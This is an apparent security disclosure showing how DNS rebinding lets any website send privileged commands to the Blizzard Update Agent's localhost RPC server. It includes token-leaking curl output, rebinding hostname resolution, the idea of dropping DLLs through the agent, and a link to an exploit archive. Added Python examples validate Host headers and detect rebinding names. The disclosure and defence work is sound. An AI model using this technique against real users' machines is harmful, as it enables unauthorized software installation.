
All Blizzard games are installed alongside a shared tool called "Blizzard Update Agent". investor.activision.com claims they have "500 million monthly active users", who presumably all have this utility installed.

The agent utility creates a JSON RPC server listening on localhost port 1120, and accepts commands to install, uninstall, change settings, update and other maintenance-related options. Blizzard use a custom authentication scheme to verify the RPCs are from a legitimate source; it looks like this:

$ curl -si http://localhost:1120/agent
HTTP/1.0 200 OK
Content-Length: 359

{
    "pid" : 3140.000000,
    "user_id" : "S-1-5-21-1613814707-140385463-2225822625-1000",
    "user_name" : "S-1-5-21-1613814707-140385463-2225822625-1000",
    "state" : 1004.000000,
    "version" : "2.13.4.5955",
    "region" : "us",
    "type" : "retail",
    "opt_in_feedback" : true,
    "session" : "15409717072196133548",
    "authorization" : "11A87920224BD1FB22AF5F868CA0E789"
}

This endpoint is permitted without authentication, but all other requests must have a valid "Authorization" header with the token in that response. As with all HTTP RPC schemes like this, a website can send requests to the daemon with XMLHttpRequest(), but I think the theory is that they will be ignored because requests must prove they can read and write the authorization property.

I don't think this design will work because of an attack called "DNS rebinding". Any website can simply create a DNS name that they are authorized to communicate with, and then make it resolve to localhost.

To be clear, this means that *any* website can send privileged commands to the agent.
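Added example, not code from the report or from Blizzard: a toy version of the same scheme (an unauthenticated /agent endpoint hands out a token that every other request must echo back) with the one check that defeats DNS rebinding. A rebound page reaches the service through a hostname the attacker controls, and the browser copies that hostname into the Host header, so the server only accepts requests whose Host names the loopback service itself. The port 1120 and the token-in-/agent shape come from the report; the handler class, the token format, the error bodies and any path other than /agent are assumptions made for illustration.

```python
"""Host-header validation for a localhost JSON RPC service (added example)."""
import ipaddress
import json
import secrets
from http.server import BaseHTTPRequestHandler, HTTPServer

LISTEN_PORT = 1120  # the agent's port, per the report


def parse_host_header(value):
    """Return (hostname, port) from a Host header, or None if malformed.

    Bracketed IPv6 literals ("[::1]:1120") are handled; a missing port
    means the HTTP default of 80.
    """
    value = value.strip()
    if value.startswith("["):
        end = value.find("]")
        if end == -1:
            return None
        host, rest = value[1:end], value[end + 1:]
    else:
        host, sep, rest = value.partition(":")
        rest = sep + rest
    if not host:
        return None
    if rest:
        if not (rest.startswith(":") and rest[1:].isdigit()):
            return None
        port = int(rest[1:])
    else:
        port = 80
    return host.lower(), port


def host_header_allowed(value, expected_port=LISTEN_PORT):
    """True only for "localhost" or a loopback IP literal on our own port.

    A rebinding hostname such as 7f000001.c7f11de3.rbndr.us is neither,
    so the request is refused before any RPC logic runs.
    """
    parsed = parse_host_header(value or "")
    if parsed is None:
        return False
    host, port = parsed
    if port != expected_port:
        return False
    if host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:  # a DNS name other than localhost
        return False


class AgentLikeHandler(BaseHTTPRequestHandler):
    """Hypothetical RPC server: /agent gives out the token, all else needs it."""

    token = secrets.token_hex(16)  # per-process secret, like "authorization" above

    def _send(self, code, payload):
        body = json.dumps(payload).encode()
        self.send_response(code)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def _host_ok(self):
        if host_header_allowed(self.headers.get("Host", "")):
            return True
        self._send(403, {"error": "unexpected Host header"})
        return False

    def do_GET(self):
        if not self._host_ok():
            return
        if self.path == "/agent":
            self._send(200, {"version": "example", "authorization": self.token})
        else:
            self._send(404, {"error": "not found"})

    def do_POST(self):
        if not self._host_ok():
            return
        if self.headers.get("Authorization") != self.token:
            self._send(401, {"error": "missing or wrong token"})
            return
        self._send(200, {"ok": True, "path": self.path})


if __name__ == "__main__":
    HTTPServer(("127.0.0.1", LISTEN_PORT), AgentLikeHandler).serve_forever()
```

The Host check is the part that matters: the token handshake proves the caller can read the /agent response, which a rebound page can do, while the Host header is filled in by the browser from the URL the page used and cannot be set from script. Checking Origin as well is reasonable defence in depth, but Origin is absent on plain navigations and some fetches, so it should not be the only gate.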

I have a domain I use for testing called rbndr.us; you can use this page to generate hostnames:

https://lock.cmpxchg8b.com/rebinder.html

Here I want to alternate between 127.0.0.1 and 199.241.29.227, so I use 7f000001.c7f11de3.rbndr.us:

$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 127.0.0.1
$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 199.241.29.227
$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 127.0.0.1

Here you can see the resolution alternates between the two addresses I want (note that, depending on caching, it might take a while to switch; the TTL is set to the minimum but some servers round up).
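Added example, not code from the report: the resolver-side view of the alternating resolution shown above. This is the approach a recursive resolver's rebind protection takes: answers pointing at loopback or private space are dropped for any name outside an allowlist, and a name whose answers flip between public and internal addresses over time is reported. The log lines are constructed for the example; the rbndr.us name and its two addresses are the ones from the host output above, and the other names and addresses are made up.

```python
"""Resolver-side DNS rebinding filter and detector (added example)."""
import ipaddress
from collections import defaultdict

# Constructed resolver log, in observation order: (query name, answer).
# The rbndr.us name and its two addresses come from the report; the
# other entries are invented for this example.
SAMPLE_LOG = [
    ("7f000001.c7f11de3.rbndr.us", "127.0.0.1"),
    ("www.example.test", "93.184.216.34"),
    ("7f000001.c7f11de3.rbndr.us", "199.241.29.227"),
    ("intranet.corp.test", "10.0.0.5"),
    ("7f000001.c7f11de3.rbndr.us", "127.0.0.1"),
    ("localhost", "127.0.0.1"),
]

# Names that legitimately resolve to internal addresses (localhost,
# split-horizon corporate names). Everything else is treated as external.
DEFAULT_ALLOW = frozenset({"localhost", "intranet.corp.test"})


def is_internal(addr_text):
    """Loopback, private (RFC 1918 / ULA), link-local or unspecified."""
    addr = ipaddress.ip_address(addr_text)
    return (addr.is_loopback or addr.is_private
            or addr.is_link_local or addr.is_unspecified)


def _key(name):
    return name.lower().rstrip(".")


def filter_rebind_answers(name, answers, allow_names=DEFAULT_ALLOW):
    """Drop internal answers for names not on the allowlist.

    Returns (kept, dropped). With this in place the browser never learns
    that the attacker's name maps to 127.0.0.1, so the rebound request to
    the local agent is never made.
    """
    if _key(name) in allow_names:
        return list(answers), []
    kept, dropped = [], []
    for addr in answers:
        (dropped if is_internal(addr) else kept).append(addr)
    return kept, dropped


def find_rebinding_names(log, allow_names=DEFAULT_ALLOW):
    """Names whose observed answers include both public and internal addresses.

    One internal answer on its own proves nothing (plenty of names resolve
    that way on purpose); the flip between public and internal is the
    signature of a rebinding name.
    """
    seen = defaultdict(lambda: {"internal": set(), "public": set()})
    for name, addr in log:
        key = _key(name)
        if key in allow_names:
            continue
        bucket = "internal" if is_internal(addr) else "public"
        seen[key][bucket].add(addr)
    return sorted(n for n, s in seen.items() if s["internal"] and s["public"])


if __name__ == "__main__":
    print("suspected rebinding names:", find_rebinding_names(SAMPLE_LOG))
    print(filter_rebind_answers("7f000001.c7f11de3.rbndr.us", ["127.0.0.1"]))
```

The allowlist is the caveat: blanket filtering of internal answers breaks split-horizon DNS and any local service that advertises itself under a public name, so production resolvers expose exactly this kind of exception list. Note also that the filter only helps clients that use that resolver; the Host check on the service itself is the fix that works everywhere.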

I just wait for the cached response to expire, and then POST commands to the server.

Exploitation would involve using network drives, or setting the destination to "Downloads" and making the browser install DLLs, data files, etc.

I made a very simple demo; I'm sure it's quite brittle, but hopefully you get the idea!

http://lock.cmpxchg8b.com/yah4od7N.html

See screenshot attached of how it's supposed to look.

Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43665.zip